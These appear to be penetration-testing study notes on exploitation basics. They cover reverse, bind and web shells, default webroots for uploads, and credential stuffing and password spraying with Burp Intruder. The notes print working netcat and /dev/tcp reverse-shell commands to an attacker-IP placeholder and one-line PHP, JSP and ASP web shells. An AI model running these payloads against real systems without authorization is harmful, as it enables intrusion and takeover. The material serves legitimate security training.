Exploitation (basics)

Exploitation is the attack performed against a system or application based on the potential vulnerability discovered during our information gathering and enumeration. We use the information from the Information Gathering stage, analyze it in the Vulnerability Assessment stage, and prepare the potential attacks. Often many companies and systems use the same applications but make different decisions about their configuration. This is because the same application can often be used for various purposes, and each organization will have different objectives.

Source: Hackthebox Academy

Shells

Reverse shell

Source:hackingtutorials.org

The target connects back to us. Initiates a connection back to a "listener" on our attack box.
Example
- in our attacking machine we type nc -nlvp 4444 (4444 is the port)
- in our target we connect be. For instance in case of a linux based machine we can do netcat ATTACKING-MACHINE-IP 4444 -e /bin/bash we could also use /bin/bash -i >& /dev/tcp/ATTACKING-MACHINE-IP/4444 0>&1

Bind shell

Source:hackingtutorials.org

We connect to the target. "Binds" to a specific port on the target host and waits for a connection from our attack box.
Example
- in our target we can do nc -nlvp 4444 -e /bin/bash
- in our attacking machine we can do nc TARGET-IP 4444

Web shell

Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command.
Communicates through a web server, accepts our commands through HTTP parameters, executes them, and prints back the output.

PHP Web shell

<?php system($_REQUEST["cmd"]); ?>

JSP webshell

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

ASP webshell

<% eval request("cmd") %>

Where to upload it

Web Server Default Webroot

Web Server	Default Webroot
Apache	`/var/www/html/`
Nginx	`/usr/local/nginx/html/`
IIS	`c:\inetpub\wwwroot\`
XAMPP	`C:\xampp\htdocs\`

Apache

/var/www/html/

Nginx

/usr/local/nginx/html/

IIS

c:\inetpub\wwwroot\

XAMPP

C:\xampp\htdocs\

echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php bash command for an Apache web server on linux
To access it shell.php?cmd=id with the browser
curl http://SERVER_IP:PORT/shell.php?cmd=id with the command line

Payloads

Source:TCM Academy

If one type of payload does not work we can try the other one

Bruteforce attacks

Check out how to use hydra here
We can also use metasploit that has multiple modules for bruteforce attacks

Credentials stuffing and password spraying

Methodology
- Use leaked creds found during the enumeration phase on the login portals found during the enumeration phase
The goal of credentials stuffing and password spraying is to taking these credentials and throwing them at a website
We can use burp intruder for this
- First we can see what we get when a login fails, and copy the string we get back
- We send the login portal to intruder and we add the login and password as variables
- We use a pitchfork attack
- We make a grep-match on the string previously copied
- Then in the payloads we take the list of users for the variable that corresponds to user and the list of passwords for the one that corresponds to the password. And then we just launch the attack.
- In the results we will see the ones that are not valid with our grep match. We can also check the response (301 is redirect for example) and the size of the paylaod (if it is really different in one of the results
Password spraying: We can also try an attack with one password and try out multiple usernames
- Caution here, checkout prior to your engagement if a lockout is in place how many tried before being locked out. When we know this we can then setup our attack to try something every hour or so.

Possible paths after this step

Path	Description
Information Gathering	Once we have initial access to the target system, regardless of how high our privileges are at that moment, we need to gather information about the local system. Whether we use this new information for privilege escalation, lateral movement, or data exfiltration does not matter. Therefore, before we can take any further steps, we need to find out what we are dealing with. This inevitably takes us to the vulnerability assessment stage, where we analyze and evaluate the information we find.
Post-Exploitation	Post-exploitation is mainly about escalating privileges if we have not yet attained the highest possible rights on the target host. As we know, more opportunities are open to us with higher privileges. This path actually includes the stages Information Gathering, Vulnerability Assessment, Exploitation, and Lateral Movement but from an internal perspective on the target system. The direct jump to post-exploitation is less frequent, but it does happen. Because through the exploitation stage, we may already have obtained the highest privileges, and from here on, we start again at Information Gathering.
Lateral Movement	From here, we can also skip directly over to Lateral Movement. This can come under different conditions. If we have achieved the highest privileges on a dual-homed system used to connect two networks, we can likely use this host to start enumerating hosts that were not previously available to us.
Proof-of-Concept	We can take the last path after gaining the highest privileges by exploiting an internal system. Of course, we do not necessarily have to have taken over all systems. However, if we have gained the Domain Admin privileges in an Active Directory environment, we can likely move freely across the entire network and perform any actions we can imagine. So we can create the Proof-of-Concept from our notes to detail and potentially automate the paths and activities and make them available to the technical department.

Path

Description

Information Gathering

Once we have initial access to the target system, regardless of how high our privileges are at that moment, we need to gather information about the local system. Whether we use this new information for privilege escalation, lateral movement, or data exfiltration does not matter. Therefore, before we can take any further steps, we need to find out what we are dealing with. This inevitably takes us to the vulnerability assessment stage, where we analyze and evaluate the information we find.

Post-Exploitation

Post-exploitation is mainly about escalating privileges if we have not yet attained the highest possible rights on the target host. As we know, more opportunities are open to us with higher privileges. This path actually includes the stages Information Gathering, Vulnerability Assessment, Exploitation, and Lateral Movement but from an internal perspective on the target system. The direct jump to post-exploitation is less frequent, but it does happen. Because through the exploitation stage, we may already have obtained the highest privileges, and from here on, we start again at Information Gathering.

Lateral Movement

From here, we can also skip directly over to Lateral Movement. This can come under different conditions. If we have achieved the highest privileges on a dual-homed system used to connect two networks, we can likely use this host to start enumerating hosts that were not previously available to us.

Proof-of-Concept

We can take the last path after gaining the highest privileges by exploiting an internal system. Of course, we do not necessarily have to have taken over all systems. However, if we have gained the Domain Admin privileges in an Active Directory environment, we can likely move freely across the entire network and perform any actions we can imagine. So we can create the Proof-of-Concept from our notes to detail and potentially automate the paths and activities and make them available to the technical department.

Source: HTB Academy

Resources

PreviousScanning & Enumeration NextPassword Attacks

Last updated 1 year ago